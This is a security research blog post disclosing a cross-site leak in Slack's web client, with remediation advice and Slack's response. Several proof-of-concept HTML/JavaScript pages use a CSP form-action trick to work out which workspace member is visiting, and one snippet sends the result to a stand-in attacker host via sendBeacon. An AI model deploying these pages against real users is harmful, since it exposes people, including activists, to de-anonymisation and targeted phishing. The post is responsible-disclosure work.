In this post, I show how a malicious member of a Slack workspace can exploit a cross-site leak in Slack’s file-sharing functionality in order to efficiently de-anonymise fellow workspace members when they visit the attacker’s website in Chromium-based browsers.

TL;DR

  • I discovered a navigation-related XSLeak technique that resists SameSite=Lax.
  • Slack’s Web client suffers from a cross-site leak linked to its file-sharing functionality.
  • An attacker can de-anonymise a fellow member of their Slack workspace among n others in no more than O(log n) HTTP requests.
  • Impact includes leaking the victim’s IP address and browser fingerprint, as well as facilitating spearphishing attacks.
  • Slack has no plans to fix it.

Cross-site leaks

Side-channel attacks are fascinating. You may remember how, back in 2014, MIT researchers were able to partially recover speech from the footage captured by a high-speed camera trained on a bag of crisps. Though usually much less spectacular, similar attacks are possible within Web browsers.

The Same-Origin Policy, browser security’s cornerstone, does provide tight isolation between different Web origins, and further isolation mechanisms have been implemented over the years; but security researchers have demonstrated, time and time again, that the barrier between origins is in practice more porous than meets the eye. Techniques for working around the SOP to leak data from one origin to another are collectively known as cross-site leaks, or XSLeaks for short.

Bug-bounty hunters, don’t get too excited: you likely won’t get rich quickly by making XSLeaks the focus of your infosec work. Many bug-bounty programmes outright dismiss the impact of XSLeaks as negligible, whereas others, such as Google’s and Twitter’s, reward reports of XSLeaks only on a case-by-case basis.

Nevertheless, the study of XSLeaks is interesting in its own right, because it naturally leads to a deeper understanding of browser misfeatures and implementation quirks.

Leaky images

A few months ago, as I was catching up on the latest research about XSLeaks, my eye fell upon some interesting research conducted at TU Darmstadt by Staicu and Pradel, which they presented at USENIX in 2019. The paper, entitled Leaky Images: Targeted Privacy Attacks in the Web, demonstrates how, under certain conditions, attackers can abuse a service’s image-sharing functionality for de-anonymising users across origins. Indeed, if the service in question

  • relies on cookies for session management, and
  • allows authenticated access to a shared image via the same URL to all parties concerned,

then an attacker who knows the resulting URL can abuse it as some kind of tracker or Web beacon.

Although the attacker doesn’t control the server at the end of that URL, a malicious page of their design can act as an oracle for questions like

Is the current visitor of the malicious page logged in as @alice on Twitter?

All the malicious page has to do is forge requests to one or more shared images and somehow detect, through XSLeak techniques, whether access by the current visitor was successful.
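Absent SameSite restrictions, such an oracle can be as simple as probing the shared image with an Image element and observing whether it loads. A minimal sketch, with a purely illustrative URL:

```javascript
// Probe a shared-image URL cross-origin: if the visitor's cookies grant
// access, the image loads and onload fires; otherwise (an error page, or
// a redirect to an HTML login page) onerror fires.
function probeSharedImage(url) {
  return new Promise(resolve => {
    const img = new Image();
    img.onload = () => resolve(true);   // visitor can access the image
    img.onerror = () => resolve(false); // visitor cannot
    img.src = url;
  });
}

// usage, in a browser:
// probeSharedImage("https://social.example/shared/secret.png")
//   .then(isAlice => console.log(isAlice ? "logged in as @alice" : "someone else"));
```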

This privacy attack is more powerful, in terms of stealth and scalability, than simply sharing some unique link in a direct message (DM) to the victim and waiting for her to visit the URL: unless she’s tech-savvy and inspects the source code of the malicious page, the victim is unlikely to realise that the malicious page’s objective is to de-anonymise her on some unrelated service; moreover, the attack can often be optimised to target a large number of users without having to share many images or forge many HTTP requests.

The Leaky Images paper reviewed several prominent sites that provide an image-sharing functionality, and concluded that alarmingly many of them, including Facebook, Twitter, Google, and Microsoft Live, were vulnerable to this kind of privacy attack.

Leaky resources on Slack

As I was reading the Leaky Images paper, I realised that it omitted one popular messaging service that provides a Web client and allows its users to share images: Slack. After a short investigation in one of my dummy Slack workspaces, I came to the conclusion that Slack’s Web client too is vulnerable to leaky-image attacks—or rather leaky-resource attacks, as the resources shared by the attacker with their victims on Slack need not be images.

Indeed, when Mallory (the attacker) shares a file named foo.txt in a DM to Alice (their victim), Slack generates a URL of the following form,

https://files.slack.com/files-pri/TXXXXXXXX-FAAAAAAAAAA/download/foo.txt

where TXXXXXXXX stands for the team/workspace ID and FAAAAAAAAAA stands for the file ID. What happens when one visits the URL in question depends on one’s browser state:

  • If either Alice or Mallory visits the URL while logged into the Slack workspace in question, a download of the shared file is triggered in their browser.
  • If some authenticated user other than Alice or Mallory visits the URL, a 302 HTTP redirect loop (from the download URL to https://TEAM_SUBDOMAIN.slack.com/?redir=%2Ffiles-pri%2FTXXXXXXXX-FAAAAAAAAAA%2Ffoo.txt to the download URL, and so on and so forth) occurs, which the browser soon cuts short.
  • If some anonymous visitor accesses the URL, they simply get redirected to https://TEAM_SUBDOMAIN.slack.com/?redir=%2Ffiles-pri%2FTXXXXXXXX-FAAAAAAAAAA%2Ffoo.txt.

Mallory can leverage this state-dependent behaviour to infer whether the current visitor of their malicious page is Alice.

Bypassing SameSite defences

One difficulty in producing a proof of concept is that Slack’s session identifier is a cookie (named d) marked SameSite=Lax. Browsers attach such a cookie to cross-site requests only when those requests are top-level navigations; subresource requests initiated from Mallory’s page (via fetch, an img element, etc.) won’t carry the d cookie. Mallory must therefore rely solely on top-level navigations.

But there’s always a way! Mallory’s malicious page can simply assign to the window.location property and then sleep for a short while, leaving enough time for the server to respond. If anyone other than Mallory or Alice visits Mallory’s page, their browser will simply follow the redirect before the sleep is over. In contrast, if Alice visits Mallory’s page while authenticated to Slack, her browser will initiate a download of the shared file instead of navigating away from Mallory’s page, and the remainder of the JavaScript code on the page will notify Mallory of Alice’s visit.

<!doctype html>
<html>
  <head>
    <meta charset="utf-8">
  </head>
  <body>
    <script>
      function sleep() {
        const ms = 10000;
        return new Promise(resolve => setTimeout(resolve, ms));
      }
      function notifyOfVisitByAlice() {
        const h1 = document.createElement("h1");
        document.body.appendChild(h1);
        h1.innerText = `Hi there, Alice!`;
      }
      async function test() {
        window.location = "https://files.slack.com/files-pri/TXXXXXXXXXX-FAAAAAAAAAA/download/foo.txt";
        await sleep();
        notifyOfVisitByAlice();
      }
      test();
    </script>
  </body>
</html>

Of course, in practice, the notifyOfVisitByAlice function would send a request to some server that Mallory controls rather than modify the DOM, but you get the idea.
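As a sketch of that exfiltration step, assuming a hypothetical collection endpoint at https://mallory.example/log (not a real server):

```javascript
// Exfiltrate the result to Mallory's server instead of touching the DOM.
// navigator.sendBeacon fires a small fire-and-forget POST that completes
// even if the visitor navigates away immediately afterwards.
function notifyOfVisitByAlice() {
  navigator.sendBeacon(
    "https://mallory.example/log",          // hypothetical endpoint
    JSON.stringify({ visitor: "Alice" })
  );
}
```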

Targeting multiple users

Targeting a single user is a bit boring, though. Could the attack instead de-anonymise multiple Slack users through a single visit to Mallory’s malicious page? One issue with the approach outlined above is that, when no download gets triggered, a redirect occurs instead, taking the victim away and robbing the malicious page of the opportunity to issue further requests.

I needed a way of somehow “cancelling” top-level navigations. Where should I look first? The Content-Security-Policy (CSP) specification does suggest that a directive named navigate-to would do the trick, but none of the prominent browsers have elected to ship it. Faced with a dead end, I shelved my investigation for a while, until I discovered a useful XSLeak technique…

A novel XSLeak technique to the rescue

Perhaps surprisingly, a GET-based HTML-form submission counts as a top-level navigation; as such, it carries cookies marked SameSite=Lax. Besides, Content Security Policy provides a way of defining an allowlist for form submissions through its form-action directive; and, in Chromium-based browsers (as opposed to Firefox and Safari), that directive happens to be enforced even on HTTP redirects.

Putting this all together: a third-party site can detect the occurrence of a cross-origin server-side redirect, even if that redirect requires, in order to occur, the presence of some SameSite=Lax cookie in the initial request. I’ve since documented this technique on xsleaks.dev. Prior research about abusing CSP to leak data to another origin does exist, including Egor Homakov’s, awesome as always. Unless I’m missing something, though, abusing form-action as described in this post is a novel technique.

Here is how I refined my initial proof of concept:

<!doctype html>
<html>
  <head>
    <meta charset="utf-8">
    <meta http-equiv="Content-Security-Policy"
          content="form-action https://files.slack.com">
  </head>
  <body>
    <form name="myForm"
          action="https://files.slack.com/files-pri/TXXXXXXXXXX-FAAAAAAAAAA/download/foo.txt">
    </form>
    <script>
      function sleep() {
        const ms = 1000;
        return new Promise(resolve => setTimeout(resolve, ms));
      }
      function notifyOfVisitByAlice() {
        const h1 = document.createElement("h1");
        document.body.appendChild(h1);
        h1.innerText = `Hi there, Alice!`;
      }
      function browserIsNotSupported() {
        // see https://developer.mozilla.org/en-US/docs/Web/HTTP/Browser_detection_using_the_user_agent
        return navigator.userAgent.includes('Firefox/') &&
          !navigator.userAgent.includes('Seamonkey/') ||
          navigator.userAgent.includes('Safari/') &&
          !navigator.userAgent.includes('Chrome/') &&
          !navigator.userAgent.includes('Chromium/');
      }
      async function test() {
        if (browserIsNotSupported()) {
          return;
        }
        var violation = false;
        window.addEventListener('securitypolicyviolation', () => {
          violation = true;
        });
        myForm.submit();
        await sleep();
        if (!violation) {
          notifyOfVisitByAlice();
        }
      }
      test();
    </script>
  </body>
</html>

I could then readily adapt my proof of concept to target multiple users; in this case, Alice and Bob:

<!doctype html>
<html>
  <head>
    <meta charset="utf-8">
    <meta http-equiv="Content-Security-Policy"
          content="form-action https://files.slack.com">
  </head>
  <body>
    <form name="myForm"></form>
    <script>
      const trackers = [
        {
          "url": "https://files.slack.com/files-pri/TXXXXXXXXXX-FAAAAAAAAAA/download/foo.txt",
          "username": "Alice"
        },{
          "url":"https://files.slack.com/files-pri/TXXXXXXXXXX-FBBBBBBBBBBB/download/foo.txt",
          "username": "Bob"
        }
      ];
      function sleep() {
        const ms = 1000;
        return new Promise(resolve => setTimeout(resolve, ms));
      }
      function notifyOfVisitBy(username) {
        const h1 = document.createElement("h1");
        document.body.appendChild(h1);
        h1.innerText = `Hi there, ${username}!`;
      }
      function browserIsNotSupported() {
        // see https://developer.mozilla.org/en-US/docs/Web/HTTP/Browser_detection_using_the_user_agent
        return navigator.userAgent.includes('Firefox/') &&
          !navigator.userAgent.includes('Seamonkey/') ||
          navigator.userAgent.includes('Safari/') &&
          !navigator.userAgent.includes('Chrome/') &&
          !navigator.userAgent.includes('Chromium/');
      }
      async function test() {
        if (browserIsNotSupported()) {
          return;
        }
        var violation = false;
        var username = "anonymous";
        window.addEventListener('securitypolicyviolation', () => {
          violation = true;
        });
        for (var i = 0; i < trackers.length; i++) {
          myForm.action = trackers[i].url;
          myForm.submit();
          await sleep();
          if (!violation) {
            username = trackers[i].username;
            break;
          }
          violation = false;
        }
        notifyOfVisitBy(username);
      }
      test();
    </script>
  </body>
</html>

If the attacker is in a position to create a “burner” Slack account, maximum stealth can be achieved. After sharing the required resources with their victims, the attacker can quickly deactivate the burner account; and, crucially,

[p]eople aren’t notified when their accounts are deactivated, nor are their messages or files deleted

but the notifications received by the victims will disappear from their Web clients!

On the other hand, the approach doesn’t scale well: it has a worst-case time complexity of O(n), where n is the number of targeted users. In plain English, the attacker must share n resources, one resource per targeted user—which could probably be automated, though—and their malicious page must, in the worst case, send as many as n HTTP requests.

Optimising the de-anonymisation attack against multiple users

An alternative, more efficient though more obtrusive, approach is possible. Slack supports group direct messages; in other words, more than two people can take part in a direct-message conversation. As outlined in section 3.3 of the Leaky Images paper, an attacker can leverage this functionality to de-anonymise one targeted user among n others by sharing no more than O(log n) resources (ceil(log2(n+1)), to be exact, since the all-zero bit vector must remain available for anonymous and untargeted visitors) and sending no more than O(log n) HTTP requests from their malicious page.
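Because the all-zero vector stays reserved for anonymous and untargeted visitors, n targeted users require enough bits to encode n + 1 distinct values. A quick sanity check:

```javascript
// Number of shared resources (bit positions) needed to distinguish n
// targeted users, with the all-zero vector reserved for everyone else.
const resourcesNeeded = n => Math.ceil(Math.log2(n + 1));
```

For instance, 3 targeted users fit in 2 bits, but a 4th user would push the requirement up to 3 bits.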

The trick consists in assigning a unique bit vector to each targeted user—reserving the zero bit vector for anonymous visitors and untargeted users. For instance, if Mallory were targeting three of their fellow workspace members (Alice, Bob, and Carol), they could associate each one of them to a unique 2-bit vector:

user                 | bit vector
---------------------|-----------
anonymous/untargeted | 00
Alice                | 01
Bob                  | 10
Carol                | 11

To each position in the bit vector corresponds a resource shared among all targeted users for which that bit is set (and nobody else). In this particular example, Mallory would share one resource with both Alice and Carol, and another resource with both Bob and Carol. By testing whether the current visitor has access to each resource, Mallory’s malicious page can compute the bit vector corresponding to the visitor:

<!doctype html>
<html>
  <head>
    <meta charset="utf-8">
    <meta http-equiv="Content-Security-Policy"
          content="form-action https://files.slack.com">
  </head>
  <body>
    <form name="myForm"></form>
    <script>
      const trackers = [
        "https://files.slack.com/files-pri/TXXXXXXXXXX-FAAAAACCCCC/download/foo.txt", // shared by Mallory with Alice and Carol
        "https://files.slack.com/files-pri/TXXXXXXXXXX-FBBBBBCCCCC/download/foo.txt"  // shared by Mallory with Bob   and Carol
      ];
      const tracked = [
        "anonymous/untracked user", // 00
        "Alice",                    // 01
        "Bob",                      // 10
        "Carol",                    // 11
      ];
      function sleep() {
        const ms = 1000;
        return new Promise(resolve => setTimeout(resolve, ms));
      }
      function notifyOfVisitBy(username) {
        const h1 = document.createElement("h1");
        document.body.appendChild(h1);
        h1.innerText = `Hi there, ${username}!`;
      }
      function browserIsNotSupported() {
        // see https://developer.mozilla.org/en-US/docs/Web/HTTP/Browser_detection_using_the_user_agent
        return navigator.userAgent.includes('Firefox/') &&
          !navigator.userAgent.includes('Seamonkey/') ||
          navigator.userAgent.includes('Safari/') &&
          !navigator.userAgent.includes('Chrome/') &&
          !navigator.userAgent.includes('Chromium/');
      }
      async function test() {
        var bv = 3; // 2-bit vector, initially all ones
        if (browserIsNotSupported()) {
          return;
        }
        window.addEventListener('securitypolicyviolation', () => {
          bv &= ~(1 << i); // clear the bit for the resource currently being probed (i is var-scoped, so the listener sees the loop's current index)
        });
        for (var i = 0; i < trackers.length; i++) {
          myForm.action = trackers[i];
          myForm.submit();
          await sleep();
        }
        notifyOfVisitBy(tracked[bv]);
      }
      test();
    </script>
  </body>
</html>
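The sharing plan itself generalises mechanically to any number of targets. A sketch, with placeholder usernames:

```javascript
// Assign each targeted user the bit vector equal to their 1-based index
// (0 stays reserved for anonymous/untargeted visitors) and compute, for
// each bit position, the set of users to share that resource with:
// exactly those whose vector has that bit set.
function planSharing(usernames) {
  const bits = Math.ceil(Math.log2(usernames.length + 1));
  const resources = [];
  for (let bit = 0; bit < bits; bit++) {
    resources.push({
      bit,
      shareWith: usernames.filter((_, i) => ((i + 1) >> bit) & 1),
    });
  }
  return resources;
}

// planSharing(["Alice", "Bob", "Carol"]) yields one resource shared with
// Alice and Carol (bit 0) and another shared with Bob and Carol (bit 1),
// matching the table above.
```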

Though much more efficient, this approach isn’t as stealthy as the linear one because it generates a lot of notification noise in the victims' Web clients; and, unfortunately for the attacker, using a burner account that they would then deactivate as in the linear approach wouldn’t make all those notifications disappear, because the corresponding DMs in general involve more than two interlocutors.

Responsible disclosure to Slack and discussion

I reported my findings to Slack through their public bug-bounty programme on HackerOne. Somewhat predictably, they chose not to reward my report; moreover, their response, which they allowed me to disclose here, left something to be desired:

Thank you for your report. We appreciate you bringing this to our attention, but after some internal discussion, we’ve chosen not to make a change here at this time.

This attack scenario differs slightly from the report you are referencing (#329957) in several ways. First, this attack relies on a “team member against team member” attack scenario, and we generally consider Workspaces to be at least somewhat “trusted spaces”. We generally require a higher severity bar for vulnerabilities that exist only within a team. Second, unlike truly public services, such as Twitter, there is at least some implied measure of trust, or at least familiarity, between two users in a Slack Workspace. This contrasts from truly public services, in which two users may not have any relationship at all. For these reasons, we will be closing this report as Informative.

Thanks, and good luck with your future bug hunting.

Before I discuss Slack’s response, let me first play the Devil’s advocate and list some mitigating factors that lessen the impact of the de-anonymisation attack.

Mitigating factors

The multi-target variant of the attack indeed suffers from some limitations:

  • It is only viable in some browsers—most notably not in Firefox and Safari—and simply doesn’t apply in Slack’s desktop client or mobile apps, which are likely more popular than Slack’s Web client is.
  • It either generates a lot of notification noise or doesn’t scale gracefully against a large number of targeted users. There may be a way of silently sharing a resource with other users, without triggering any notification, but I’m not aware of any.
  • It is somewhat brittle insofar as it’s partly timing-based; inappropriate calibration of the delay (ms, in my PoC) may cause spurious results.

Nevertheless, I find Slack’s response underwhelming for several reasons.

Implied trust between members

Slack may be overestimating the implied trust between members. The Electronic Frontier Foundation (EFF), in a post about Slack privacy merits and demerits, hits the nail on the head:

Any group environment is only as trustworthy as the people who participate in it. Group members can share and even screenshot content, so it is important to establish guidelines and expectations that all members agree on.

There are many large, cross-business Slack workspaces; take the EBRC’s or Chromium’s as examples. Implicitly assuming mutual trust between so many members is dangerous.

Low barrier to entry

Although the attacker must be a member of the Slack workspace whose members they plan to target, the barrier to entry tends to be low. For instance, by default, any non-guest member can invite people to join their Slack workspace. Besides, although admins can restrict signup to people whose email address matches an allowlist of domains, few elect to do so, and when they do, their allowlist can, regrettably, be quite permissive.

Workspace membership is fluid

New members join; some existing ones leave, whether given the choice or not. Even formerly revered members may receive a ban after a series of missteps. In fact, Slack itself acknowledges that the composition of a workspace isn’t set in stone and urges admins to diligently curate their list of members for security reasons:

Deactivate members’ accounts who no longer need access. Change is constant, and people come and go. Don’t forget to deactivate a member’s account when they leave.

This injunction contradicts Slack’s stance in their response to my report.

Privacy matters more to some than to others

In this era of third-party tracking run amok and a never-ending series of data leaks, the possibility of de-anonymisation may only elicit a bored yawn from the average Joe or Jane. For other people, though, privacy is paramount and must be protected at all costs. Slack itself boasts about its value for government entities and military personnel. The EFF observes that

[c]ommunity groups, activists, and workers in the United States are increasingly gravitating toward Slack to communicate and coordinate efforts.

An attacker may follow de-anonymisation with a spearphishing attack. How likely would you be to check the domain name in your browser’s address bar if you were lured to a spoofed Slack login form with your email address—which Slack discloses to other members by default—prefilled?

Even if we discard the possibility of follow-up phishing attacks, de-anonymisation and the harvesting of IP addresses and browser fingerprints can be weaponised. Only very recently, several Youth For Climate activists protesting gentrification in Paris saw their IP addresses and browser fingerprints handed over to French police by ProtonMail, which ultimately led to their arrest. Some nefarious for-profit organisations even specialise in correlating social-media posts with geographical locations and other signals, and routinely partner with law enforcement (or worse) to monitor and crack down on protestors, political dissidents, and activists.

By the way, if you want to help right a wrong, you can hunt on ProtonMail’s public bug-bounty programme and donate your bounties to Youth For Climate, as I did.

Users are defenceless

Users cannot do much to protect themselves against de-anonymisation. They cannot prevent attackers from installing “tracker” resources, because any workspace member can send a DM to any other; and, as far as I know, Slack doesn’t allow users to block other users. Users aware of the attack may be tempted to mute the DM conversation with the attacker, but doing so doesn’t help at all. Measures that effectively protect users who insist on accessing Slack through its Web client are limited to

  • diligently using a dedicated browser instance for Slack and/or the Tor network,
  • not browsing anything other than Slack while logged in, or
  • disabling JavaScript altogether.

Remediation guidance

For all the reasons listed above, Slack should plug this privacy hole. I can think of two options.

Slack could generate user-specific URLs for accessing shared resources. One stateless implementation would have Slack’s backend require, in the URL, an HMAC value specific to both the requesting user and the requested resource. Unfortunately, this approach may be difficult to retrofit without breaking access to resources that have already been shared, and it may also conflict with caching.

Alternatively, Slack could leverage Fetch Metadata request headers, a browser security feature that provides valuable information about the nature of requests sent by compliant browsers. Entering the URL in the browser’s address bar would indeed trigger a request containing the following headers,

Sec-Fetch-Site: none
Sec-Fetch-User: ?1

whereas the requests sent by the malicious page contain the following header,

Sec-Fetch-Site: cross-site

This observable difference should be enough for Slack to discriminate between a genuine request and a de-anonymisation attack of the kind I’ve outlined in this post.
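Server-side, such a check could look like the following sketch (the handler shape is illustrative):

```javascript
// Decide whether a request for a shared file should be served, based on
// Fetch Metadata. Browsers that don't send Sec-Fetch-Site are allowed
// through, so this is a defence-in-depth measure for compliant browsers,
// not a complete fix on its own.
function isAllowedFileRequest(headers) {
  const site = headers["sec-fetch-site"];
  if (site === undefined) return true; // legacy browser: allow
  if (site === "none" || site === "same-origin" || site === "same-site") {
    return true; // address bar, or Slack's own pages
  }
  return false; // "cross-site": likely a forged request; block
}
```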

Thoughts on Chromium’s form-action implementation

Whether form-action should block redirects after a form submission is a matter of dispute; even the W3C hasn’t made up its collective mind, and the directive’s behaviour in the face of redirects remains unspecified. The conversation in the relevant GitHub issue has so far revolved around the risk of form-data exfiltration and the tradeoff between strictness and usability, but the possibility of an attacker abusing form-action to effect an XSLeak of the kind described here appears to have been overlooked.

Perhaps this post will contribute, to some extent, to getting the Chromium team to reconsider its implementation decisions regarding form-action, as the current implementation somewhat undermines the benefits of SameSite=Lax.

Acknowledgements

Thanks a lot to Zach Edwards, who gave me valuable feedback on my findings. Thanks also to Alesandro Ortiz and @pixeldetracking who kindly agreed to review an early draft of this post.